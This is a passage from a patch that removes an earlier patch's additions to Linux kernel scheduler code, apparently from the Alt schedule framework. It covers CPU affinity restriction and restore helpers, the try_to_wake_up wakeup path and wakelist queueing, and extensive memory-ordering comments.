-+	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
-+	const struct cpumask *cpu_valid_mask = cpu_active_mask;
-+	bool kthread = p->flags & PF_KTHREAD;
-+	struct cpumask *user_mask = NULL;
-+	int dest_cpu;
-+	int ret = 0;
-+
-+	if (kthread || is_migration_disabled(p)) {
-+		/*
-+		 * Kernel threads are allowed on online && !active CPUs,
-+		 * however, during cpu-hot-unplug, even these might get pushed
-+		 * away if not KTHREAD_IS_PER_CPU.
-+		 *
-+		 * Specifically, migration_disabled() tasks must not fail the
-+		 * cpumask_any_and_distribute() pick below, esp. so on
-+		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
-+		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
-+		 */
-+		cpu_valid_mask = cpu_online_mask;
-+	}
-+
-+	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	/*
-+	 * Must re-check here, to close a race against __kthread_bind(),
-+	 * sched_setaffinity() is not guaranteed to observe the flag.
-+	 */
-+	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	if (cpumask_equal(&p->cpus_mask, new_mask))
-+		goto out;
-+
-+	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
-+	if (dest_cpu >= nr_cpu_ids) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	__do_set_cpus_allowed(p, new_mask);
-+
-+	if (flags & SCA_USER)
-+		user_mask = clear_user_cpus_ptr(p);
-+
-+	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
-+
-+	kfree(user_mask);
-+
-+	return ret;
-+
-+out:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+
-+	return ret;
-+}
-+
-+/*
-+ * Change a given task's CPU affinity. Migrate the thread to a
-+ * proper CPU and schedule it away if the CPU it's executing on
-+ * is removed from the allowed bitmask.
-+ *
-+ * NOTE: the caller must have a valid reference to the task, the
-+ * task must not exit() & deallocate itself prematurely. The
-+ * call is not atomic; no spinlocks may be held.
-+ */
-+static int __set_cpus_allowed_ptr(struct task_struct *p,
-+				  const struct cpumask *new_mask, u32 flags)
-+{
-+	unsigned long irq_flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
-+}
-+
-+int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	return __set_cpus_allowed_ptr(p, new_mask, 0);
-+}
-+EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
-+
-+/*
-+ * Change a given task's CPU affinity to the intersection of its current
-+ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
-+ * and pointing @p->user_cpus_ptr to a copy of the old mask.
-+ * If the resulting mask is empty, leave the affinity unchanged and return
-+ * -EINVAL.
-+ */
-+static int restrict_cpus_allowed_ptr(struct task_struct *p,
-+				     struct cpumask *new_mask,
-+				     const struct cpumask *subset_mask)
-+{
-+	struct cpumask *user_mask = NULL;
-+	unsigned long irq_flags;
-+	raw_spinlock_t *lock;
-+	struct rq *rq;
-+	int err;
-+
-+	if (!p->user_cpus_ptr) {
-+		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
-+		if (!user_mask)
-+			return -ENOMEM;
-+	}
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
-+		err = -EINVAL;
-+		goto err_unlock;
-+	}
-+
-+	/*
-+	 * We're about to butcher the task affinity, so keep track of what
-+	 * the user asked for in case we're able to restore it later on.
-+	 */
-+	if (user_mask) {
-+		cpumask_copy(user_mask, p->cpus_ptr);
-+		p->user_cpus_ptr = user_mask;
-+	}
-+
-+	/*return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, &rf);*/
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
-+
-+err_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	kfree(user_mask);
-+	return err;
-+}
-+
-+/*
-+ * Restrict the CPU affinity of task @p so that it is a subset of
-+ * task_cpu_possible_mask() and point @p->user_cpu_ptr to a copy of the
-+ * old affinity mask. If the resulting mask is empty, we warn and walk
-+ * up the cpuset hierarchy until we find a suitable mask.
-+ */
-+void force_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	cpumask_var_t new_mask;
-+	const struct cpumask *override_mask = task_cpu_possible_mask(p);
-+
-+	alloc_cpumask_var(&new_mask, GFP_KERNEL);
-+
-+	/*
-+	 * __migrate_task() can fail silently in the face of concurrent
-+	 * offlining of the chosen destination CPU, so take the hotplug
-+	 * lock to ensure that the migration succeeds.
-+	 */
-+	cpus_read_lock();
-+	if (!cpumask_available(new_mask))
-+		goto out_set_mask;
-+
-+	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
-+		goto out_free_mask;
-+
-+	/*
-+	 * We failed to find a valid subset of the affinity mask for the
-+	 * task, so override it based on its cpuset hierarchy.
-+	 */
-+	cpuset_cpus_allowed(p, new_mask);
-+	override_mask = new_mask;
-+
-+out_set_mask:
-+	if (printk_ratelimit()) {
-+		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
-+				task_pid_nr(p), p->comm,
-+				cpumask_pr_args(override_mask));
-+	}
-+
-+	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
-+out_free_mask:
-+	cpus_read_unlock();
-+	free_cpumask_var(new_mask);
-+}
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
-+
-+/*
-+ * Restore the affinity of a task @p which was previously restricted by a
-+ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
-+ * @p->user_cpus_ptr.
-+ *
-+ * It is the caller's responsibility to serialise this with any calls to
-+ * force_compatible_cpus_allowed_ptr(@p).
-+ */
-+void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = p->user_cpus_ptr;
-+	unsigned long flags;
-+
-+	/*
-+	 * Try to restore the old affinity mask. If this fails, then
-+	 * we free the mask explicitly to avoid it being inherited across
-+	 * a subsequent fork().
-+	 */
-+	if (!user_mask || !__sched_setaffinity(p, user_mask))
-+		return;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	user_mask = clear_user_cpus_ptr(p);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	kfree(user_mask);
-+}
-+
-+#else /* CONFIG_SMP */
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+static inline int
-+__set_cpus_allowed_ptr(struct task_struct *p,
-+		       const struct cpumask *new_mask, u32 flags)
-+{
-+	return set_cpus_allowed_ptr(p, new_mask);
-+}
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return false;
-+}
-+
-+#endif /* !CONFIG_SMP */
-+
-+static void
-+ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq;
-+
-+	if (!schedstat_enabled())
-+		return;
-+
-+	rq = this_rq();
-+
-+#ifdef CONFIG_SMP
-+	if (cpu == rq->cpu) {
-+		__schedstat_inc(rq->ttwu_local);
-+		__schedstat_inc(p->stats.nr_wakeups_local);
-+	} else {
-+		/** Alt schedule FW ToDo:
-+		 * How to do ttwu_wake_remote
-+		 */
-+	}
-+#endif /* CONFIG_SMP */
-+
-+	__schedstat_inc(rq->ttwu_count);
-+	__schedstat_inc(p->stats.nr_wakeups);
-+}
-+
-+/*
-+ * Mark the task runnable and perform wakeup-preemption.
-+ */
-+static inline void
-+ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	check_preempt_curr(rq);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	trace_sched_wakeup(p);
-+}
-+
-+static inline void
-+ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	if (p->sched_contributes_to_load)
-+		rq->nr_uninterruptible--;
-+
-+	if (
-+#ifdef CONFIG_SMP
-+	    !(wake_flags & WF_MIGRATED) &&
-+#endif
-+	    p->in_iowait) {
-+		delayacct_blkio_end(p);
-+		atomic_dec(&task_rq(p)->nr_iowait);
-+	}
-+
-+	activate_task(p, rq);
-+	ttwu_do_wakeup(rq, p, 0);
-+}
-+
-+/*
-+ * Consider @p being inside a wait loop:
-+ *
-+ *   for (;;) {
-+ *      set_current_state(TASK_UNINTERRUPTIBLE);
-+ *
-+ *      if (CONDITION)
-+ *         break;
-+ *
-+ *      schedule();
-+ *   }
-+ *   __set_current_state(TASK_RUNNING);
-+ *
-+ * between set_current_state() and schedule(). In this case @p is still
-+ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
-+ * an atomic manner.
-+ *
-+ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
-+ * then schedule() must still happen and p->state can be changed to
-+ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
-+ * need to do a full wakeup with enqueue.
-+ *
-+ * Returns: %true when the wakeup is done,
-+ *          %false otherwise.
-+ */
-+static int ttwu_runnable(struct task_struct *p, int wake_flags)
-+{
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	int ret = 0;
-+
-+	rq = __task_access_lock(p, &lock);
-+	if (task_on_rq_queued(p)) {
-+		/* check_preempt_curr() may use rq clock */
-+		update_rq_clock(rq);
-+		ttwu_do_wakeup(rq, p, wake_flags);
-+		ret = 1;
-+	}
-+	__task_access_unlock(p, lock);
-+
-+	return ret;
-+}
-+
-+#ifdef CONFIG_SMP
-+void sched_ttwu_pending(void *arg)
-+{
-+	struct llist_node *llist = arg;
-+	struct rq *rq = this_rq();
-+	struct task_struct *p, *t;
-+	struct rq_flags rf;
-+
-+	if (!llist)
-+		return;
-+
-+	/*
-+	 * rq::ttwu_pending racy indication of out-standing wakeups.
-+	 * Races such that false-negatives are possible, since they
-+	 * are shorter lived that false-positives would be.
-+	 */
-+	WRITE_ONCE(rq->ttwu_pending, 0);
-+
-+	rq_lock_irqsave(rq, &rf);
-+	update_rq_clock(rq);
-+
-+	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
-+		if (WARN_ON_ONCE(p->on_cpu))
-+			smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
-+			set_task_cpu(p, cpu_of(rq));
-+
-+		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
-+	}
-+
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+void send_call_function_single_ipi(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (!set_nr_if_polling(rq->idle))
-+		arch_send_call_function_single_ipi(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+/*
-+ * Queue a task on the target CPUs wake_list and wake the CPU via IPI if
-+ * necessary. The wakee CPU on receipt of the IPI will queue the task
-+ * via sched_ttwu_wakeup() for activation so the wakee incurs the cost
-+ * of the wakeup instead of the waker.
-+ */
-+static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
-+
-+	WRITE_ONCE(rq->ttwu_pending, 1);
-+	__smp_call_single_queue(cpu, &p->wake_entry.llist);
-+}
-+
-+static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
-+{
-+	/*
-+	 * Do not complicate things with the async wake_list while the CPU is
-+	 * in hotplug state.
-+	 */
-+	if (!cpu_active(cpu))
-+		return false;
-+
-+	/* Ensure the task will still be allowed to run on the CPU. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/*
-+	 * If the CPU does not share cache, then queue the task on the
-+	 * remote rqs wakelist to avoid accessing remote data.
-+	 */
-+	if (!cpus_share_cache(smp_processor_id(), cpu))
-+		return true;
-+
-+	if (cpu == smp_processor_id())
-+		return false;
-+
-+	/*
-+	 * If the wakee cpu is idle, or the task is descheduling and the
-+	 * only running task on the CPU, then use the wakelist to offload
-+	 * the task activation to the idle (or soon-to-be-idle) CPU as
-+	 * the current CPU is likely busy. nr_running is checked to
-+	 * avoid unnecessary task stacking.
-+	 *
-+	 * Note that we can only get here with (wakee) p->on_rq=0,
-+	 * p->on_cpu can be whatever, we've done the dequeue, so
-+	 * the wakee has been accounted out of ->nr_running.
-+	 */
-+	if (!cpu_rq(cpu)->nr_running)
-+		return true;
-+
-+	return false;
-+}
-+
-+static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
-+		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
-+		__ttwu_queue_wakelist(p, cpu, wake_flags);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_if_idle(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	rcu_read_lock();
-+
-+	if (!is_idle_task(rcu_dereference(rq->curr)))
-+		goto out;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (is_idle_task(rq->curr))
-+		resched_curr(rq);
-+	/* Else CPU is not idle, do nothing here */
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out:
-+	rcu_read_unlock();
-+}
-+
-+bool cpus_share_cache(int this_cpu, int that_cpu)
-+{
-+	if (this_cpu == that_cpu)
-+		return true;
-+
-+	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
-+}
-+#else /* !CONFIG_SMP */
-+
-+static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	return false;
-+}
-+
-+#endif /* CONFIG_SMP */
-+
-+static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (ttwu_queue_wakelist(p, cpu, wake_flags))
-+		return;
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+	ttwu_do_activate(rq, p, wake_flags);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Invoked from try_to_wake_up() to check whether the task can be woken up.
-+ *
-+ * The caller holds p::pi_lock if p != current or has preemption
-+ * disabled when p == current.
-+ *
-+ * The rules of PREEMPT_RT saved_state:
-+ *
-+ *   The related locking code always holds p::pi_lock when updating
-+ *   p::saved_state, which means the code is fully serialized in both cases.
-+ *
-+ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
-+ *   bits set. This allows to distinguish all wakeup scenarios.
-+ */
-+static __always_inline
-+bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
-+{
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
-+		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
-+			     state != TASK_RTLOCK_WAIT);
-+	}
-+
-+	if (READ_ONCE(p->__state) & state) {
-+		*success = 1;
-+		return true;
-+	}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+	/*
-+	 * Saved state preserves the task state across blocking on
-+	 * an RT lock.  If the state matches, set p::saved_state to
-+	 * TASK_RUNNING, but do not wake the task because it waits
-+	 * for a lock wakeup. Also indicate success because from
-+	 * the regular waker's point of view this has succeeded.
-+	 *
-+	 * After acquiring the lock the task will restore p::__state
-+	 * from p::saved_state which ensures that the regular
-+	 * wakeup is not lost. The restore will also set
-+	 * p::saved_state to TASK_RUNNING so any further tests will
-+	 * not result in false positives vs. @success
-+	 */
-+	if (p->saved_state & state) {
-+		p->saved_state = TASK_RUNNING;
-+		*success = 1;
-+	}
-+#endif
-+	return false;
-+}
-+
-+/*
-+ * Notes on Program-Order guarantees on SMP systems.
-+ *
-+ *  MIGRATION
-+ *
-+ * The basic program-order guarantee on SMP systems is that when a task [t]
-+ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
-+ * execution on its new CPU [c1].
-+ *
-+ * For migration (of runnable tasks) this is provided by the following means:
-+ *
-+ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
-+ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
-+ *     rq(c1)->lock (if not at the same time, then in that order).
-+ *  C) LOCK of the rq(c1)->lock scheduling in task
-+ *
-+ * Transitivity guarantees that B happens after A and C after B.
-+ * Note: we only require RCpc transitivity.
-+ * Note: the CPU doing B need not be c0 or c1
-+ *
-+ * Example:
-+ *
-+ *   CPU0            CPU1            CPU2
-+ *
-+ *   LOCK rq(0)->lock
-+ *   sched-out X
-+ *   sched-in Y
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(0)->lock // orders against CPU0
-+ *                                   dequeue X
-+ *                                   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(1)->lock
-+ *                                   enqueue X
-+ *                                   UNLOCK rq(1)->lock
-+ *
-+ *                   LOCK rq(1)->lock // orders against CPU2
-+ *                   sched-out Z
-+ *                   sched-in X
-+ *                   UNLOCK rq(1)->lock
-+ *
-+ *
-+ *  BLOCKING -- aka. SLEEP + WAKEUP
-+ *
-+ * For blocking we (obviously) need to provide the same guarantee as for
-+ * migration. However the means are completely different as there is no lock
-+ * chain to provide order. Instead we do:
-+ *
-+ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
-+ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
-+ *
-+ * Example:
-+ *
-+ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
-+ *
-+ *   LOCK rq(0)->lock LOCK X->pi_lock
-+ *   dequeue X
-+ *   sched-out X
-+ *   smp_store_release(X->on_cpu, 0);
-+ *
-+ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
-+ *                    X->state = WAKING
-+ *                    set_task_cpu(X,2)
-+ *
-+ *                    LOCK rq(2)->lock
-+ *                    enqueue X
-+ *                    X->state = RUNNING
-+ *                    UNLOCK rq(2)->lock
-+ *
-+ *                                          LOCK rq(2)->lock // orders against CPU1
-+ *                                          sched-out Z
-+ *                                          sched-in X
-+ *                                          UNLOCK rq(2)->lock
-+ *
-+ *                    UNLOCK X->pi_lock
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *
-+ * However; for wakeups there is a second guarantee we must provide, namely we
-+ * must observe the state that lead to our wakeup. That is, not only must our
-+ * task observe its own prior state, it must also observe the stores prior to
-+ * its wakeup.
-+ *
-+ * This means that any means of doing remote wakeups must order the CPU doing
-+ * the wakeup against the CPU the task is going to end up running on. This,
-+ * however, is already required for the regular Program-Order guarantee above,
-+ * since the waking CPU is the one issueing the ACQUIRE (smp_cond_load_acquire).
-+ *
-+ */
-+
-+/**
-+ * try_to_wake_up - wake up a thread
-+ * @p: the thread to be awakened
-+ * @state: the mask of task states that can be woken
-+ * @wake_flags: wake modifier flags (WF_*)
-+ *
-+ * Conceptually does:
-+ *
-+ *   If (@state & @p->state) @p->state = TASK_RUNNING.
-+ *
-+ * If the task was not queued/runnable, also place it back on a runqueue.
-+ *
-+ * This function is atomic against schedule() which would dequeue the task.
-+ *
-+ * It issues a full memory barrier before accessing @p->state, see the comment
-+ * with set_current_state().
-+ *
-+ * Uses p->pi_lock to serialize against concurrent wake-ups.
-+ *
-+ * Relies on p->pi_lock stabilizing:
-+ *  - p->sched_class
-+ *  - p->cpus_ptr
-+ *  - p->sched_task_group
-+ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
-+ *
-+ * Tries really hard to only take one task_rq(p)->lock for performance.
-+ * Takes rq->lock in:
-+ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
-+ *  - ttwu_queue()       -- new rq, for enqueue of the task;
-+ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
-+ *
-+ * As a consequence we race really badly with just about everything. See the
-+ * many memory barriers and their comments for details.
-+ *
-+ * Return: %true if @p->state changes (an actual wakeup was done),
-+ *	   %false otherwise.
-+ */
-+static int try_to_wake_up(struct task_struct *p, unsigned int state,
-+			  int wake_flags)
-+{
-+	unsigned long flags;
-+	int cpu, success = 0;
-+
-+	preempt_disable();
-+	if (p == current) {
-+		/*
-+		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
-+		 * == smp_processor_id()'. Together this means we can special
-+		 * case the whole 'p->on_rq && ttwu_runnable()' case below
-+		 * without taking any locks.
-+		 *
-+		 * In particular:
-+		 *  - we rely on Program-Order guarantees for all the ordering,
-+		 *  - we're serialized against set_special_state() by virtue of
-+		 *    it disabling IRQs (this allows not taking ->pi_lock).
-+		 */
-+		if (!ttwu_state_match(p, state, &success))
-+			goto out;
-+
-+		trace_sched_waking(p);
-+		WRITE_ONCE(p->__state, TASK_RUNNING);
-+		trace_sched_wakeup(p);
-+		goto out;
-+	}
-+
-+	/*
-+	 * If we are going to wake up a thread waiting for CONDITION we
-+	 * need to ensure that CONDITION=1 done by the caller can not be
-+	 * reordered with p->state check below. This pairs with smp_store_mb()
-+	 * in set_current_state() that the waiting thread does.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	smp_mb__after_spinlock();
-+	if (!ttwu_state_match(p, state, &success))
-+		goto unlock;
-+
-+	trace_sched_waking(p);
-+
-+	/*
-+	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
-+	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
-+	 * in smp_cond_load_acquire() below.
-+	 *
-+	 * sched_ttwu_pending()			try_to_wake_up()
-+	 *   STORE p->on_rq = 1			  LOAD p->state
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * [task p]
-+	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * A similar smb_rmb() lives in try_invoke_on_locked_down_task().
-+	 */
-+	smp_rmb();
-+	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
-+		goto unlock;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
-+	 * possible to, falsely, observe p->on_cpu == 0.
-+	 *
-+	 * One must be running (->on_cpu == 1) in order to remove oneself
-+	 * from the runqueue.
-+	 *
-+	 * __schedule() (switch to task 'p')	try_to_wake_up()
-+	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (put 'p' to sleep)
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
-+	 * schedule()'s deactivate_task() has 'happened' and p will no longer
-+	 * care about it's own p->state. See the comment in __schedule().
-+	 */
-+	smp_acquire__after_ctrl_dep();
-+
-+	/*
-+	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
-+	 * == 0), which means we need to do an enqueue, change p->state to
-+	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
-+	 * enqueue, such as ttwu_queue_wakelist().
-+	 */
-+	WRITE_ONCE(p->__state, TASK_WAKING);
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, considering queueing p on the remote CPUs wake_list
-+	 * which potentially sends an IPI instead of spinning on p->on_cpu to
-+	 * let the waker make forward progress. This is safe because IRQs are
-+	 * disabled and the IPI will deliver after on_cpu is cleared.
-+	 *
-+	 * Ensure we load task_cpu(p) after p->on_cpu:
-+	 *
-+	 * set_task_cpu(p, cpu);
-+	 *   STORE p->cpu = @cpu
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock
-+	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
-+	 *   STORE p->on_cpu = 1                LOAD p->cpu
-+	 *
-+	 * to ensure we observe the correct CPU on which the task is currently
-+	 * scheduling.
-+	 */
-+	if (smp_load_acquire(&p->on_cpu) &&
-+	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
-+		goto unlock;
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, wait until it's done referencing the task.
-+	 *
-+	 * Pairs with the smp_store_release() in finish_task().
-+	 *
-+	 * This ensures that tasks getting woken will be fully ordered against
-+	 * their previous state and preserve Program Order.
-+	 */
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+	sched_task_ttwu(p);
-+
-+	cpu = select_task_rq(p);
-+
-+	if (cpu != task_cpu(p)) {
-+		if (p->in_iowait) {
-+			delayacct_blkio_end(p);
-+			atomic_dec(&task_rq(p)->nr_iowait);
-+		}
-+
-+		wake_flags |= WF_MIGRATED;
-+		psi_ttwu_dequeue(p);
-+		set_task_cpu(p, cpu);
-+	}
-+#else
-+	cpu = task_cpu(p);
-+#endif /* CONFIG_SMP */
-+
-+	ttwu_queue(p, cpu, wake_flags);
-+unlock:
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+out:
-+	if (success)
-+		ttwu_stat(p, task_cpu(p), wake_flags);
-+	preempt_enable();
-+
-+	return success;
-+}
-+
-+static bool __task_needs_rq_lock(struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
-+	 * the task is blocked. Make sure to check @state since ttwu() can drop
-+	 * locks at the end, see ttwu_queue_wakelist().
-+	 */
-+	if (state == TASK_RUNNING || state == TASK_WAKING)
-+		return true;
-+
-+	/*
-+	 * Ensure we load p->on_rq after p->__state, otherwise it would be
-+	 * possible to, falsely, observe p->on_rq == 0.
-+	 *
-+	 * See try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	if (p->on_rq)
-+		return true;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure the task has finished __schedule() and will not be referenced
-+	 * anymore. Again, see try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+#endif
-+
-+	return false;
-+}
-+
-+/**
-+ * task_call_func - Invoke a function on task in fixed state
-+ * @p: Process for which the function is to be invoked, can be @current.
-+ * @func: Function to invoke.
-+ * @arg: Argument to function.
-+ *
-+ * Fix the task in it's current state by avoiding wakeups and or rq operations
-+ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
-+ * to work out what the state is, if required.  Given that @func can be invoked
-+ * with a runqueue lock held, it had better be quite lightweight.
-+ *
-+ * Returns:
-+ *   Whatever @func returns
-+ */
-+int task_call_func(struct task_struct *p, task_call_f func, void *arg)
-+{
-+	struct rq *rq = NULL;
-+	struct rq_flags rf;
-+	int ret;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
-+
-+	if (__task_needs_rq_lock(p))
-+		rq = __task_rq_lock(p, &rf);
-+
-+	/*
-+	 * At this point the task is pinned; either:
-+	 *  - blocked and we're holding off wakeups      (pi->lock)
-+	 *  - woken, and we're holding off enqueue       (rq->lock)
-+	 *  - queued, and we're holding off schedule     (rq->lock)
-+	 *  - running, and we're holding off de-schedule (rq->lock)
-+	 *
-+	 * The called function (@func) can use: task_curr(), p->on_rq and
-+	 * p->__state to differentiate between these states.
-+	 */
-+	ret = func(p, arg);
-+
-+	if (rq)
-+		__task_rq_unlock(rq, &rf);
-+
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
-+	return ret;
-+}
-+
-+/**
-+ * cpu_curr_snapshot - Return a snapshot of the currently running task
-+ * @cpu: The CPU on which to snapshot the task.
-+ *
-+ * Returns the task_struct pointer of the task "currently" running on
-+ * the specified CPU.  If the same task is running on that CPU throughout,
-+ * the return value will be a pointer to that task's task_struct structure.
-+ * If the CPU did any context switches even vaguely concurrently with the
-+ * execution of this function, the return value will be a pointer to the
-+ * task_struct structure of a randomly chosen task that was running on
-+ * that CPU somewhere around the time that this function was executing.
-+ *
-+ * If the specified CPU was offline, the return value is whatever it
-+ * is, perhaps a pointer to the task_struct structure of that CPU's idle
-+ * task, but there is no guarantee.  Callers wishing a useful return
-+ * value must take some action to ensure that the specified CPU remains
-+ * online throughout.
-+ *
-+ * This function executes full memory barriers before and after fetching
-+ * the pointer, which permits the caller to confine this function's fetch
-+ * with respect to the caller's accesses to other shared variables.
-+ */
-+struct task_struct *cpu_curr_snapshot(int cpu)
-+{
-+	struct task_struct *t;
-+
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	t = rcu_dereference(cpu_curr(cpu));
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	return t;
-+}
-+
-+/**
-+ * wake_up_process - Wake up a specific process
-+ * @p: The process to be woken up.
-+ *
